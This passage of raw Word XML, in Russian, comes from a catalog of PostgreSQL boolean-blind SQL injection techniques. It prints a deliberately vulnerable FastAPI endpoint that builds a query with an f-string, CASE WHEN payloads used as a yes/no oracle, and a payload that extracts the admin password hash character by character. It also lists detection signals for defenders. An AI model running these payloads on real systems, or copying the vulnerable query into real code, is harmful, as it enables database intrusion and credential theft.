          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-blind применяется, когда приложение не возвращает ни данных, ни текста ошибки, ни видимой задержки — но реагирует на присутствие или отсутствие строк в результате запроса. Главный примитив в PostgreSQL —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используемый и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и в SELECT-листе. В PG нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (это MySQL-конструкция, в PG её нет в SQL-режиме), поэтому весь категория-каталог строится на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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с 3.2.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оба паттерна используют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как бинарный oracle, но различаются каналом наблюдения:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 — oracle через различие HTTP-status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> бросает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">division by zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → HTTP 500, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ELSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отрабатывает → HTTP 200. Работает, когда приложение глотает текст ошибки, но статус-код различим.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 — oracle через различие содержимого HTTP 200: запрос либо возвращает строки, либо не возвращает; либо одну и ту же строку, либо ничего. Работает, когда статус всегда 200, но body различим.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если приложение возвращает одинаковый HTTP-status и одинаковое body независимо от условия — оба канала закрыты, и техника не работает. Следующая ступень эскалации — 3.4 Time-based blind, использующий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качестве канала наблюдения по времени ответа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура категории. Три подраздела:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1 —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как примитив для построения boolean-выражения, фундамент для всего остального.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.2 — bit-by-bit extraction через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ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с бинарным поиском.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.3 — row-count канал через tautology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не требующий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вообще.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал требует, чтобы у атакующего была возможность сделать тысячи запросов (для посимвольного извлечения) — это не атака на один-два HTTP-вызова, это длинный экстракшен.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1 `CASE WHEN` как boolean primitive</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CASE WHEN cond THEN a ELSE b END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фундаментальный условный примитив PG, возвращающий разные значения в зависимости от истинности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cond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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</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@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эндпоинт всегда возвращает HTTP 200 — либо с продуктом, либо с пустым списком. Текст ошибок не пробрасывается. Это и есть классический контекст boolean-blind.</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pP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в скалярном контексте:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN current_user = 'app_user' THEN 1 ELSE 0 END)</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CASE WHEN current_user = 'app_user' THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие истинно → подзапрос возвращает 1 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → продукт с id=1 в ответе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие ложно → подзапрос возвращает 0 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → пустой результат.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pP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в булевом контексте:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1 AND (CASE WHEN current_user = 'app_user' THEN TRUE ELSE FALSE END)</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1 AND (CASE WHEN current_user = 'app_user' THEN TRUE ELSE FALSE END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Истинно → возвращает продукт id=1, ложно → пустой ответ.</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получил бинарный oracle: каждый payload — это один вопрос «да/нет».</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CASE WHEN ... THEN ... ELSE ... END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартное SQL-выражение, реализованное в PG в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/adt/case.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это short-circuit конструкция. Тип результата — общий тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN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ELSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ветвей, потому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN 1 ELSE 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> корректно возвращает integer. В PG нет SQL-функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поэтому весь boolean-blind строится на </w:t>
      </w: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Никаких специальных привилегий. Главное условие — наблюдаемое различие в HTTP-ответе.</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 одна из самых распространённых SQL-конструкций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN &lt;subquery&gt; THEN 1 ELSE 0 END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в скалярном контексте, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</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-condition, где обе ветки — литералы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN 1 ELSE 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THEN TRUE ELSE FALSE</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поток запросов с одинаковой формой, отличающихся подстрокой сравнения внутри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Корреляция в логах: short response (пустой результат) и normal response (с данными) чередуются с одного клиента.</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3.3.2, 3.3.3, 3.2.3, 3.4.</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PortSwigger SQL injection cheat sheet — Blind SQL injection; HackTricks: PostgreSQL injection — Boolean based; PostgreSQL Documentation: Conditional Expressions — CASE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.2 Bit-by-bit extraction через `substring()` + `ascii()`</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Когда нужно извлечь не один бит, а строку (хеш пароля, токен, имя), атакующий читает её по одному символу. Каждый символ — это число 0–255 (ASCII), которое можно угадать бинарным поиском: 7 запросов на ASCII. На 60-байтный bcrypt-хеш нужно ~420 HTTP-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что в 3.3.1.</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Шаг 1 — сравнение с серединой ASCII:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN 1 ELSE 0 END)</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CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
